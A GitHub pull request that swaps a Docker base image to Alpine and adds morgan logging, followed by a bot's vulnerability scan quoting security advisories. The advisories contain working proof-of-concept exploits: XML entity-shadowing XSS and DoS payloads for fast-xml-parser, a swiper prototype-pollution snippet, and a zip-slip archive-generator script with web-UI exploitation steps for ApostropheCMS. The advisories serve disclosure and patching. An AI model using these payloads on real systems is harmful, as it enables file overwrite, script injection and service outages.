Change image. add debug #259

Merged
a-nomad merged 3 commits into main from devops/change-image
Mar 19, 2026

Conversation

a-nomad (Contributor) commented Mar 19, 2026

This PR makes two main changes: (1) it switches the Docker base image from node:24-slim to node:24-alpine to reduce the container image size, updating the user-creation commands for Alpine compatibility, and (2) it adds request logging to the Express configuration via the morgan middleware, logging timestamps, HTTP methods, URLs, status codes, and response times.

coderabbitai bot commented Mar 19, 2026

Walkthrough

The pull request switches the Dockerfile base images from node:24-slim to node:24-alpine and updates user/group creation commands to Alpine-compatible syntax using addgroup -S and adduser -S -G appgroup. Concurrently, a new Express middleware hook is added to website/modules/@apostrophecms/express/index.js that integrates request logging via morgan. The morgan package is added to website/package.json dependencies at version ^1.10.0. Build and runtime steps remain functionally unchanged.
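The Alpine-compatible user setup described above might look like the following Dockerfile fragment (a sketch; the user name `appuser` is an assumption, only `appgroup` appears in the walkthrough):

```dockerfile
# node:24-alpine ships BusyBox, so Debian's groupadd/useradd are replaced
# by addgroup/adduser: -S creates a system group/user, -G sets the group.
FROM node:24-alpine
RUN addgroup -S appgroup \
 && adduser -S appuser -G appgroup
USER appuser
```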

Possibly related PRs

  • Change base image #258: Modifies the same Dockerfile base image and user/group creation commands for Alpine compatibility.
🚥 Pre-merge checks | ✅ 2 | ❌ 1

❌ Failed checks (1 inconclusive)

  • Title check: ❓ Inconclusive. The title 'Change image. add debug' is vague and does not accurately describe the main changes in the pull request, which involve switching to Alpine images, adding Morgan middleware for request logging, and installing the Morgan dependency. Resolution: update the title to clearly describe the actual changes, such as 'Switch to Alpine images and add request logging with Morgan'.
✅ Passed checks (2 passed)
  • Description Check: ✅ Passed. Check skipped; CodeRabbit's high-level summary is enabled.
  • Docstring Coverage: ✅ Passed. No functions found in the changed files to evaluate; skipping docstring coverage check.


github-actions bot commented Mar 19, 2026

🔍 Vulnerabilities of apostrophe-cms:test

📦 Image Reference: apostrophe-cms:test
digest: sha256:90f6b12d34cfdc6482579c3e179af7200c0061748fc4031365aa52fd16aec134
vulnerabilities: critical: 5, high: 36, medium: 0, low: 0
platform: linux/amd64
size: 173 MB
packages: 975
📦 Base Image node:24-alpine
also known as
  • 24-alpine3.23
  • 24.14-alpine
  • 24.14-alpine3.23
  • 24.14.0-alpine
  • 24.14.0-alpine3.23
  • krypton-alpine
  • krypton-alpine3.23
  • lts-alpine
  • lts-alpine3.23
digest: sha256:e9445c64ace1a9b5cdc60fc98dd82d1e5142985d902f41c2407e8fffe49d46a3
vulnerabilities: critical: 0, high: 6, medium: 2, low: 1
critical: 1 high: 3 medium: 0 low: 0 fast-xml-parser 5.2.0 (npm)

pkg:npm/fast-xml-parser@5.2.0

critical 9.3: CVE-2026-25896 Incorrect Regular Expression

Affected range: >=5.0.0, <5.3.5
Fixed version: 5.3.5
CVSS Score: 9.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N
EPSS Score: 0.040%
EPSS Percentile: 12th
Description

Entity encoding bypass via regex injection in DOCTYPE entity names

Summary

A dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (&lt;, &gt;, &amp;, &quot;, &apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.

Details

The fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed . (period), which is valid in XML names per the W3C spec.

In DocTypeReader.js, entity names are passed directly to RegExp():

entities[entityName] = {
    regx: RegExp(`&${entityName};`, "g"),
    val: val
};

An entity named l. produces the regex /&l.;/g where . matches any character, including the t in &lt;. Since DOCTYPE entities are replaced before built-in entities, this shadows &lt; entirely.

The same issue exists in OrderedObjParser.js:81 (addExternalEntities), and in the v6 codebase - EntitiesParser.js has a validateEntityName function with a character blacklist, but . is not included:

// v6 EntitiesParser.js line 96
const specialChar = "!?\\/[]$%{}^&*()<>|+";  // no dot

Shadowing all 5 built-in entities

Entity name | Regex created | Shadows
----------- | ------------- | -------
l.          | /&l.;/g       | &lt;
g.          | /&g.;/g       | &gt;
am.         | /&am.;/g      | &amp;
quo.        | /&quo.;/g     | &quot;
apo.        | /&apo.;/g     | &apos;

PoC

const { XMLParser } = require("fast-xml-parser");

const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY l. "<img src=x onerror=alert(1)>">
]>
<root>
  <text>Hello &lt;b&gt;World&lt;/b&gt;</text>
</root>`;

const result = new XMLParser().parse(xml);
console.log(result.root.text);
// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>

No special parser options needed - processEntities: true is the default.

When an app renders result.root.text in a page (e.g. innerHTML, template interpolation, SSR), the injected <img onerror> fires.

&amp; can be shadowed too:

const xml2 = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY am. "'; DROP TABLE users;--">
]>
<root>SELECT * FROM t WHERE name='O&amp;Brien'</root>`;

const r = new XMLParser().parse(xml2);
console.log(r.root);
// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'

Impact

This is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.

  • Default config, no special options
  • Attacker can replace any &lt; / &gt; / &amp; / &quot; / &apos; with arbitrary strings
  • Direct XSS vector when parsed XML content is rendered in a page
  • v5 and v6 both affected

Suggested fix

Escape regex metacharacters before constructing the replacement regex:

const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
entities[entityName] = {
    regx: RegExp(`&${escaped};`, "g"),
    val: val
};

For v6, add . to the blacklist in validateEntityName:

const specialChar = "!?\\/[].{}^&*()<>|+";

Severity

CWE-185 (Incorrect Regular Expression)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N - 9.3 (CRITICAL)

Entity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.

high 7.5: CVE-2026-33036 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected range: >=4.0.0-beta.3, <=5.5.5
Fixed version: 5.5.6
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Description

Summary

The fix for CVE-2026-26278 added entity expansion limits (maxTotalExpansions, maxExpandedLength, maxEntityCount, maxEntitySize) to prevent XML entity expansion Denial of Service. However, these limits are only enforced for DOCTYPE-defined entities. Numeric character references (&#NNN; and &#xHH;) and standard XML entities (&lt;, &gt;, etc.) are processed through a separate code path that does NOT enforce any expansion limits.

An attacker can use massive numbers of numeric entity references to completely bypass all configured limits, causing excessive memory allocation and CPU consumption.

Affected Versions

fast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)

Root Cause

In src/xmlparser/OrderedObjParser.js, the replaceEntitiesValue() function has two separate entity replacement loops:

  1. Lines 638-670: DOCTYPE entities — expansion counting with entityExpansionCount and currentExpandedLength tracking. This was the CVE-2026-26278 fix.
  2. Lines 674-677: lastEntities loop — replaces standard entities including num_dec (/&#([0-9]{1,7});/g) and num_hex (/&#x([0-9a-fA-F]{1,6});/g). This loop has NO expansion counting at all.

The numeric entity regex replacements at lines 97-98 are part of lastEntities and go through the uncounted loop, completely bypassing the CVE-2026-26278 fix.

Proof of Concept

const { XMLParser } = require('fast-xml-parser');

// Even with strict explicit limits, numeric entities bypass them
const parser = new XMLParser({
  processEntities: {
    enabled: true,
    maxTotalExpansions: 10,
    maxExpandedLength: 100,
    maxEntityCount: 1,
    maxEntitySize: 10
  }
});

// 100K numeric entity references — should be blocked by maxTotalExpansions=10
const xml = `<root>${'&#65;'.repeat(100000)}</root>`;
const result = parser.parse(xml);

// Output: 500,000 chars — bypasses maxExpandedLength=100 completely
console.log('Output length:', result.root.length);  // 500000
console.log('Expected max:', 100);  // limit was 100

Results:

  • 100K &#65; references → 500,000 char output (5x default maxExpandedLength of 100,000)
  • 1M references → 5,000,000 char output, ~147MB memory consumed
  • Even with maxTotalExpansions=10 and maxExpandedLength=100, 10K references produce 50,000 chars
  • Hex entities (&#x41;) exhibit the same bypass

Impact

Denial of Service — An attacker who can provide XML input to applications using fast-xml-parser can cause:

  • Excessive memory allocation (147MB+ for 1M entity references)
  • CPU consumption during regex replacement
  • Potential process crash via OOM

This is particularly dangerous because the application developer may have explicitly configured strict entity expansion limits believing they are protected, while numeric entities silently bypass all of them.

Suggested Fix

Apply the same entityExpansionCount and currentExpandedLength tracking to the lastEntities loop (lines 674-677) and the HTML entities loop (lines 680-686), similar to how DOCTYPE entities are tracked at lines 638-670.

Workaround

Set htmlEntities: false.

high 7.5: CVE-2026-26278 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected range: >=5.0.0, <5.3.6
Fixed version: 5.3.6
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.064%
EPSS Percentile: 20th
Description

Summary

The XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application.

Details

There is a check in DocTypeReader.js that tries to prevent entity expansion attacks by rejecting entities that reference other entities (it looks for & inside entity values). This does stop classic “Billion Laughs” payloads.

However, it doesn’t stop a much simpler variant.

If you define one large entity that contains only raw text (no & characters) and then reference it many times, the parser will happily expand it every time. There is no limit on how large the expanded result can become, or how many replacements are allowed.

The problem is in replaceEntitiesValue() inside OrderedObjParser.js. It repeatedly runs val.replace() in a loop, without any checks on total output size or execution cost. As the entity grows or the number of references increases, parsing time explodes.

Relevant code:

DocTypeReader.js (lines 28–33): entity registration only checks for &

OrderedObjParser.js (lines 439–458): entity replacement loop with no limits

PoC

const { XMLParser } = require('fast-xml-parser');

const entity = 'A'.repeat(1000);
const refs = '&big;'.repeat(100);
const xml = `<!DOCTYPE foo [<!ENTITY big "${entity}">]><root>${refs}</root>`;

console.time('parse');
new XMLParser().parse(xml); // ~4–8 seconds for ~1.3 KB of XML
console.timeEnd('parse');

// 5,000 chars × 100 refs takes 200+ seconds
// 50,000 chars × 1,000 refs will hang indefinitely

Impact

This is a straightforward denial-of-service issue.

Any service that parses user-supplied XML using the default configuration is vulnerable. Since Node.js runs on a single thread, the moment the parser starts expanding entities, the event loop is blocked. While this is happening, the server can’t handle any other requests.

In testing, a payload of only a few kilobytes was enough to make a simple HTTP server completely unresponsive for several minutes, with all other requests timing out.

Workaround

Avoid DOCTYPE entity processing by setting the processEntities: false option.

high 7.5: CVE-2026-25128 Improper Input Validation

Affected range: >=5.0.9, <=5.3.3
Fixed version: 5.3.4
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.074%
EPSS Percentile: 22nd
Description

Summary

A RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., &#9999999; or &#xFFFFFF;). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input.

Details

The vulnerability exists in /src/xmlparser/OrderedObjParser.js at lines 44-45:

"num_dec": { regex: /&#([0-9]{1,7});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 10)) },
"num_hex": { regex: /&#x([0-9a-fA-F]{1,6});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 16)) },

The String.fromCodePoint() method throws a RangeError when the code point exceeds the valid Unicode range (0 to 0x10FFFF / 1114111). The regex patterns can capture values far exceeding this:

  • [0-9]{1,7} matches up to 9,999,999
  • [0-9a-fA-F]{1,6} matches up to 0xFFFFFF (16,777,215)

The entity replacement in replaceEntitiesValue() (line 452) has no try-catch:

val = val.replace(entity.regex, entity.val);

This causes the RangeError to propagate uncaught, crashing the parser and any application using it.

PoC

Setup

Create a directory with these files:

poc/
├── package.json
├── server.js

package.json

{ "dependencies": { "fast-xml-parser": "^5.3.3" } }

server.js

const http = require('http');
const { XMLParser } = require('fast-xml-parser');

const parser = new XMLParser({ processEntities: true, htmlEntities: true });

http.createServer((req, res) => {
  if (req.method === 'POST' && req.url === '/parse') {
    let body = '';
    req.on('data', c => body += c);
    req.on('end', () => {
      const result = parser.parse(body);  // No try-catch - will crash!
      res.end(JSON.stringify(result));
    });
  } else {
    res.end('POST /parse with XML body');
  }
}).listen(3000, () => console.log('http://localhost:3000'));

Run

# Setup
npm install

# Terminal 1: Start server
node server.js

# Terminal 2: Send malicious payload (server will crash)
curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0"?><root>&#9999999;</root>' http://localhost:3000/parse

Result

Server crashes with:

RangeError: Invalid code point 9999999

Alternative Payloads

<!-- Hex variant -->
<?xml version="1.0"?><root>&#xFFFFFF;</root>

<!-- In attribute -->
<?xml version="1.0"?><root attr="&#9999999;"/>

Impact

Denial of Service (DoS): Any application using fast-xml-parser to process untrusted XML input will crash when encountering malformed numeric entities. This affects:

  • API servers accepting XML payloads
  • File processors parsing uploaded XML files
  • Message queues consuming XML messages
  • RSS/Atom feed parsers
  • SOAP/XML-RPC services

A single malicious request is sufficient to crash the entire Node.js process, causing service disruption until manual restart.

critical: 1 high: 2 medium: 0 low: 0 fast-xml-parser 4.5.3 (npm)

pkg:npm/fast-xml-parser@4.5.3

critical 9.3: CVE-2026-25896 Incorrect Regular Expression

Affected range: >=4.1.3, <4.5.4
Fixed version: 5.3.5
CVSS Score: 9.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N
EPSS Score: 0.040%
EPSS Percentile: 12th
Description

Entity encoding bypass via regex injection in DOCTYPE entity names

Summary

A dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (&lt;, &gt;, &amp;, &quot;, &apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.

Details

The fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed . (period), which is valid in XML names per the W3C spec.

In DocTypeReader.js, entity names are passed directly to RegExp():

entities[entityName] = {
    regx: RegExp(`&${entityName};`, "g"),
    val: val
};

An entity named l. produces the regex /&l.;/g where . matches any character, including the t in &lt;. Since DOCTYPE entities are replaced before built-in entities, this shadows &lt; entirely.

The same issue exists in OrderedObjParser.js:81 (addExternalEntities), and in the v6 codebase - EntitiesParser.js has a validateEntityName function with a character blacklist, but . is not included:

// v6 EntitiesParser.js line 96
const specialChar = "!?\\/[]$%{}^&*()<>|+";  // no dot

Shadowing all 5 built-in entities

Entity name | Regex created | Shadows
----------- | ------------- | -------
l.          | /&l.;/g       | &lt;
g.          | /&g.;/g       | &gt;
am.         | /&am.;/g      | &amp;
quo.        | /&quo.;/g     | &quot;
apo.        | /&apo.;/g     | &apos;

PoC

const { XMLParser } = require("fast-xml-parser");

const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY l. "<img src=x onerror=alert(1)>">
]>
<root>
  <text>Hello &lt;b&gt;World&lt;/b&gt;</text>
</root>`;

const result = new XMLParser().parse(xml);
console.log(result.root.text);
// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>

No special parser options needed - processEntities: true is the default.

When an app renders result.root.text in a page (e.g. innerHTML, template interpolation, SSR), the injected <img onerror> fires.

&amp; can be shadowed too:

const xml2 = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY am. "'; DROP TABLE users;--">
]>
<root>SELECT * FROM t WHERE name='O&amp;Brien'</root>`;

const r = new XMLParser().parse(xml2);
console.log(r.root);
// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'

Impact

This is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.

  • Default config, no special options
  • Attacker can replace any &lt; / &gt; / &amp; / &quot; / &apos; with arbitrary strings
  • Direct XSS vector when parsed XML content is rendered in a page
  • v5 and v6 both affected

Suggested fix

Escape regex metacharacters before constructing the replacement regex:

const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
entities[entityName] = {
    regx: RegExp(`&${escaped};`, "g"),
    val: val
};

For v6, add . to the blacklist in validateEntityName:

const specialChar = "!?\\/[].{}^&*()<>|+";

Severity

CWE-185 (Incorrect Regular Expression)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N - 9.3 (CRITICAL)

Entity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.

high 7.5: CVE-2026-33036 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected range: >=4.0.0-beta.3, <=5.5.5
Fixed version: 5.5.6
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Description

Summary

The fix for CVE-2026-26278 added entity expansion limits (maxTotalExpansions, maxExpandedLength, maxEntityCount, maxEntitySize) to prevent XML entity expansion Denial of Service. However, these limits are only enforced for DOCTYPE-defined entities. Numeric character references (&#NNN; and &#xHH;) and standard XML entities (&lt;, &gt;, etc.) are processed through a separate code path that does NOT enforce any expansion limits.

An attacker can use massive numbers of numeric entity references to completely bypass all configured limits, causing excessive memory allocation and CPU consumption.

Affected Versions

fast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)

Root Cause

In src/xmlparser/OrderedObjParser.js, the replaceEntitiesValue() function has two separate entity replacement loops:

  1. Lines 638-670: DOCTYPE entities — expansion counting with entityExpansionCount and currentExpandedLength tracking. This was the CVE-2026-26278 fix.
  2. Lines 674-677: lastEntities loop — replaces standard entities including num_dec (/&#([0-9]{1,7});/g) and num_hex (/&#x([0-9a-fA-F]{1,6});/g). This loop has NO expansion counting at all.

The numeric entity regex replacements at lines 97-98 are part of lastEntities and go through the uncounted loop, completely bypassing the CVE-2026-26278 fix.

Proof of Concept

const { XMLParser } = require('fast-xml-parser');

// Even with strict explicit limits, numeric entities bypass them
const parser = new XMLParser({
  processEntities: {
    enabled: true,
    maxTotalExpansions: 10,
    maxExpandedLength: 100,
    maxEntityCount: 1,
    maxEntitySize: 10
  }
});

// 100K numeric entity references — should be blocked by maxTotalExpansions=10
const xml = `<root>${'&#65;'.repeat(100000)}</root>`;
const result = parser.parse(xml);

// Output: 500,000 chars — bypasses maxExpandedLength=100 completely
console.log('Output length:', result.root.length);  // 500000
console.log('Expected max:', 100);  // limit was 100

Results:

  • 100K &#65; references → 500,000 char output (5x default maxExpandedLength of 100,000)
  • 1M references → 5,000,000 char output, ~147MB memory consumed
  • Even with maxTotalExpansions=10 and maxExpandedLength=100, 10K references produce 50,000 chars
  • Hex entities (&#x41;) exhibit the same bypass

Impact

Denial of Service — An attacker who can provide XML input to applications using fast-xml-parser can cause:

  • Excessive memory allocation (147MB+ for 1M entity references)
  • CPU consumption during regex replacement
  • Potential process crash via OOM

This is particularly dangerous because the application developer may have explicitly configured strict entity expansion limits believing they are protected, while numeric entities silently bypass all of them.

Suggested Fix

Apply the same entityExpansionCount and currentExpandedLength tracking to the lastEntities loop (lines 674-677) and the HTML entities loop (lines 680-686), similar to how DOCTYPE entities are tracked at lines 638-670.

Workaround

Set htmlEntities: false.

high 7.5: CVE-2026-26278 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected range: >=4.1.3, <4.5.4
Fixed version: 5.3.6
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.064%
EPSS Percentile: 20th
Description

Summary

The XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application.

Details

There is a check in DocTypeReader.js that tries to prevent entity expansion attacks by rejecting entities that reference other entities (it looks for & inside entity values). This does stop classic “Billion Laughs” payloads.

However, it doesn’t stop a much simpler variant.

If you define one large entity that contains only raw text (no & characters) and then reference it many times, the parser will happily expand it every time. There is no limit on how large the expanded result can become, or how many replacements are allowed.

The problem is in replaceEntitiesValue() inside OrderedObjParser.js. It repeatedly runs val.replace() in a loop, without any checks on total output size or execution cost. As the entity grows or the number of references increases, parsing time explodes.

Relevant code:

DocTypeReader.js (lines 28–33): entity registration only checks for &

OrderedObjParser.js (lines 439–458): entity replacement loop with no limits

PoC

const { XMLParser } = require('fast-xml-parser');

const entity = 'A'.repeat(1000);
const refs = '&big;'.repeat(100);
const xml = `<!DOCTYPE foo [<!ENTITY big "${entity}">]><root>${refs}</root>`;

console.time('parse');
new XMLParser().parse(xml); // ~4–8 seconds for ~1.3 KB of XML
console.timeEnd('parse');

// 5,000 chars × 100 refs takes 200+ seconds
// 50,000 chars × 1,000 refs will hang indefinitely

Impact

This is a straightforward denial-of-service issue.

Any service that parses user-supplied XML using the default configuration is vulnerable. Since Node.js runs on a single thread, the moment the parser starts expanding entities, the event loop is blocked. While this is happening, the server can’t handle any other requests.

In testing, a payload of only a few kilobytes was enough to make a simple HTTP server completely unresponsive for several minutes, with all other requests timing out.

Workaround

Avoid DOCTYPE entity processing by setting the processEntities: false option.

critical: 1 high: 0 medium: 0 low: 0 swiper 11.2.6 (npm)

pkg:npm/swiper@11.2.6

critical 9.4: CVE-2026-27212 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Affected range: >=6.5.1, <12.1.2
Fixed version: 12.1.2
CVSS Score: 9.4
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
EPSS Score: 0.058%
EPSS Percentile: 18th
Description

Summary

A prototype pollution vulnerability exists in the npm package swiper (>=6.5.1, <12.1.2). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input contained a forbidden key, it is still possible to pollute Object.prototype via a crafted input using Array.prototype. The exploit works on Windows and Linux and on the Node and Bun runtimes. This issue is fixed in version 12.1.2.

Details

The vulnerability resides at line 94 of shared/utils.mjs, where the indexOf() function is used to check whether user-provided input contains forbidden strings.

PoC

Steps to reproduce

  1. Install latest version of swiper using npm install
  2. Run the following code snippet:
var swiper = require('swiper');
Array.prototype.indexOf = () => -1;        
let obj = {};
var malicious_payload = '{"__proto__":{"polluted":"yes"}}';
console.log({}.polluted);
swiper.default.extendDefaults(JSON.parse(malicious_payload));
console.log({}.polluted);  // prints yes -> indicating that the patch was bypassed and prototype pollution occurred

Expected behavior

Prototype pollution should be prevented and {} should not gain new properties.
This should be printed on the console:

undefined
undefined OR throw an Error

Actual behavior

Object.prototype is polluted
This is printed on the console:

undefined 
yes

Impact

This is a prototype pollution vulnerability, which can have severe security implications depending on how swiper is used by downstream applications. Any application that processes attacker-controlled input using this package may be affected.
It could potentially lead to the following problems:

  1. Authentication bypass
  2. Denial of service - Even if an attacker is not able to exploit prototype pollution in swiper, if there is a prototype pollution within the project from other dependencies, modifying global Array.prototype.indexOf property can result in crash when swiper.default.extendDefaults is called because swiper makes use of this global property. This can lead to Denial of Service.
  3. Remote code execution (if polluted property is passed to sinks like eval or child_process)

Related CVEs

CVE-2026-25521
CVE-2026-25047
CVE-2026-26021

critical: 1 high: 0 medium: 0 low: 0 @apostrophecms/import-export 3.2.0 (npm)

pkg:npm/%40apostrophecms/import-export@3.2.0

critical 9.9: CVE-2026-32731 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range: <=3.5.2
Fixed version: 3.5.3
CVSS Score: 9.9
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Description

Reported: 2026-03-08
Status: patched and released in version 3.5.3 of @apostrophecms/import-export


Product

Repository: apostrophecms/apostrophe (monorepo)
Affected Package: @apostrophecms/import-export
Affected File: packages/import-export/lib/formats/gzip.js
Affected Function: extract(filepath, exportPath), lines ~132–157
Minimum Required Permission: Global Content Modify (any editor-level user with import access)

Vulnerability Summary

The extract() function in gzip.js constructs file-write paths using:

fs.createWriteStream(path.join(exportPath, header.name))

path.join() does not resolve or sanitise traversal segments such as ../. It concatenates them as-is, meaning a tar entry named ../../evil.js resolves to a path outside the intended extraction directory. No canonical-path check is performed before the write stream is opened.

This is a textbook Zip Slip vulnerability. Any user who has been granted the Global Content Modify permission — a role routinely assigned to content editors and site managers — can upload a crafted .tar.gz file through the standard CMS import UI and write attacker-controlled content to any path the Node.js process can reach on the host filesystem.


Security Impact

This vulnerability provides unauthenticated-equivalent arbitrary file write to any user with content editor permissions. The full impact chain is:

1. Arbitrary File Write

Write any file to any path the Node.js process user can access. Confirmed writable targets in testing:

  • Any path the CMS process user has permission to write

2. Static Web Directory — Defacement & Malicious Asset Injection

ApostropheCMS serves <project-root>/public/ via Express static middleware:

// packages/apostrophe/modules/@apostrophecms/asset/index.js
express.static(self.apos.rootDir + '/public', self.options.static || {})

A traversal payload targeting public/ makes any uploaded file directly HTTP-accessible:

This enables:

  • Full site defacement
  • Serving phishing pages from the legitimate CMS domain
  • Injecting malicious JavaScript served to all site visitors (stored XSS at scale)

3. Persistent Backdoor / RCE (Post-Restart)

If the traversal targets any .js file loaded by Node.js on startup (e.g., a module index.js, a config file, a routes file), the payload becomes a persistent backdoor that executes with the CMS process privileges on the next server restart. In container/cloud environments, restarts happen automatically on deploy, crash, or health-check failure — meaning the attacker does not need to manually trigger one.

4. Credential and Secret File Overwrite

Overwrite .env, app.config.js, database seed files, or any config file to:

  • Exfiltrate database credentials on next load
  • Redirect authentication to an attacker-controlled backend
  • Disable security controls (rate limiting, MFA, CSRF)

5. Denial of Service

Overwrite any critical application file (package.json, node_modules entries, etc.) with garbage data, rendering the application unbootable.


Required Permission

Global Content Modify — this is a standard editor-level permission routinely granted to content managers, blog editors, and site administrators in typical ApostropheCMS deployments. It is not an administrator-only capability. Any organisation that delegates content editing to non-technical staff is exposed.


Proof of Concept

Two PoC artifacts are provided:

tmp-import-export-zip-slip-poc.js: automated Node.js harness; verifies the write happens without a browser
make-slip-tar.py: attacker tool; generates a real .tar.gz for upload via the CMS web UI

PoC 1 — Automated Verification (tmp-import-export-zip-slip-poc.js)

const fs = require('node:fs');
const fsp = require('node:fs/promises');
const path = require('node:path');
const os = require('node:os');
const zlib = require('node:zlib');
const tar = require('tar-stream');

const gzipFormat = require('./packages/import-export/lib/formats/gzip.js');

async function makeArchive(archivePath) {
  const pack = tar.pack();
  const gzip = zlib.createGzip();
  const out = fs.createWriteStream(archivePath);

  const done = new Promise((resolve, reject) => {
    out.on('finish', resolve);
    out.on('error', reject);
    gzip.on('error', reject);
    pack.on('error', reject);
  });

  pack.pipe(gzip).pipe(out);

  pack.entry({ name: 'aposDocs.json' }, '[]');
  pack.entry({ name: 'aposAttachments.json' }, '[]');

  // Traversal payload
  pack.entry({ name: '../../zip-slip-pwned.txt' }, 'PWNED_FROM_TAR');

  pack.finalize();
  await done;
}

(async () => {
  const base = await fsp.mkdtemp(path.join(os.tmpdir(), 'apos-zip-slip-'));
  const archivePath = path.join(base, 'evil-export.gz');
  const exportPath = archivePath.replace(/\.gz$/, '');

  await makeArchive(archivePath);

  const expectedOutsideWrite = path.resolve(exportPath, '../../zip-slip-pwned.txt');

  // Ensure clean pre-state
  try { await fsp.unlink(expectedOutsideWrite); } catch (_) {}

  await gzipFormat.input(archivePath);

  const exists = fs.existsSync(expectedOutsideWrite);
  const content = exists ? await fsp.readFile(expectedOutsideWrite, 'utf8') : '';

  console.log('EXPORT_PATH:', exportPath);
  console.log('EXPECTED_OUTSIDE_WRITE:', expectedOutsideWrite);
  console.log('ZIP_SLIP_WRITE_HAPPENED:', exists);
  console.log('WRITTEN_CONTENT:', content.trim());
})();

Run:

node .\tmp-import-export-zip-slip-poc.js

Observed output (confirmed):

EXPORT_PATH:            C:\Users\...\AppData\Local\Temp\apos-zip-slip-XXXXXX\evil-export
EXPECTED_OUTSIDE_WRITE: C:\Users\...\AppData\Local\Temp\zip-slip-pwned.txt
ZIP_SLIP_WRITE_HAPPENED: true
WRITTEN_CONTENT:        PWNED_FROM_TAR

The file zip-slip-pwned.txt is written two directories above the extraction root, confirming path traversal.


PoC 2 — Web UI Exploitation (make-slip-tar.py)

Script (make-slip-tar.py):

import tarfile, io, sys

if len(sys.argv) != 3:
    print("Usage: python make-slip-tar.py <payload_file> <target_path>")
    sys.exit(1)

payload_file = sys.argv[1]
target_path  = sys.argv[2]
out = "evil-slip.tar.gz"

with open(payload_file, "rb") as f:
    payload = f.read()

with tarfile.open(out, "w:gz") as t:
    docs = io.BytesIO(b"[]")
    info = tarfile.TarInfo("aposDocs.json")
    info.size = len(docs.getvalue())
    t.addfile(info, docs)

    atts = io.BytesIO(b"[]")
    info = tarfile.TarInfo("aposAttachments.json")
    info.size = len(atts.getvalue())
    t.addfile(info, atts)

    info = tarfile.TarInfo(target_path)
    info.size = len(payload)
    t.addfile(info, io.BytesIO(payload))

print("created", out)

Steps to Reproduce (Web UI — Real Exploitation)

Step 1 — Create the payload file

Create a file with the content you want to write to the server. For a static web directory write:

echo "<!-- injected by attacker --><script>alert('XSS')</script>" > payload.html

Step 2 — Generate the malicious archive

Use the traversal path that reaches the CMS public/ directory. The number of ../ segments depends on where the CMS stores its temporary extraction directory relative to the project root — typically 2–4 levels up. Adjust as needed:

python make-slip-tar.py payload.html "../../../../<project-root>/public/injected.html"

This creates evil-slip.tar.gz containing:

  • aposDocs.json — empty, required by the importer
  • aposAttachments.json — empty, required by the importer
  • ../../../../<project-root>/public/injected.html — the traversal payload

Step 3 — Upload via CMS Import UI

  1. Log in to the CMS with any account that has Global Content Modify permission.
  2. Navigate to Open Global Settings → More Options → Import.
  3. Select evil-slip.tar.gz and click Import.
  4. The CMS accepts the file and begins extraction — no error is shown.

Step 4 — Confirm the write

curl http://localhost:3000/injected.html

Expected response:

<!-- injected by attacker --><script>alert('XSS')</script>

